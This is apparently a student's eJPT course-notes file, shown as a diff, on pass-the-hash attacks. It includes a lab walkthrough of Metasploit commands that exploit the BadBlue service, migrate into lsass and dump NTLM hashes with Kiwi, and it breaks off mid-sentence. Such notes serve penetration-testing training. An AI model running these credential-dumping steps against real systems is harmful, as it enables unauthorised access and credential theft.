noelenz/eJPT-Course-Notes/Host & Network Penetration Testing /System & Host Based Attacks /Windows /Credential Dumping.md

 # Pass-The-Hash Attacks
 ## Pass-The-Hash
 - Pass-the-hash is an exploitation technique that involves captturing or harversting NTLM hashes or clear-text passwords and utilizing them to authenticate with the target legitimately.
-- We can use multiple tools to facilitate a Pass-The-Hash atack:
+- We can use multiple tools to facilitate a Pass-The-Hash attack:
   - Metasploit PsExec module
   - Crackmapexec
 - This technique will allow us to obtain access to the target system via legitimate credentials as opposed to obtaining acces via service exploitation

+## Demo: Pass-The-Hash Attacks

+We start with the exploiting the BadBlue service and then we dump the hashes using Kiwi.
+Then we try to use the hashes to perform a pass-the-hash attack.

+`service postgresql start && msf console` msf6:`searcg badblue`

+msf6:`use 1`

+we leave the default payload as windows/meterpreter/reverse_tcp

+msf6:`set rhosts [target IP]`

+msf6:`exploit`

+meterpreter session successful.

+meterpreter:`pgrep lsass`

+meterpreter: `migrate [process ID]`

+meterpreter: `getuid`

+whe should have admin privs.

+meterpreter: `load kiwi`

+meterpreter: `lsa_dump_sam`

+With lsa_dump_sam we want to get the admin ntlm credentials.
+We get the admin NTLM hash.
+We can copy that into a txt file.

+Now we want to try the first technique with the PSExec metasploit module.

+meterpreter: `hashdump`

+We also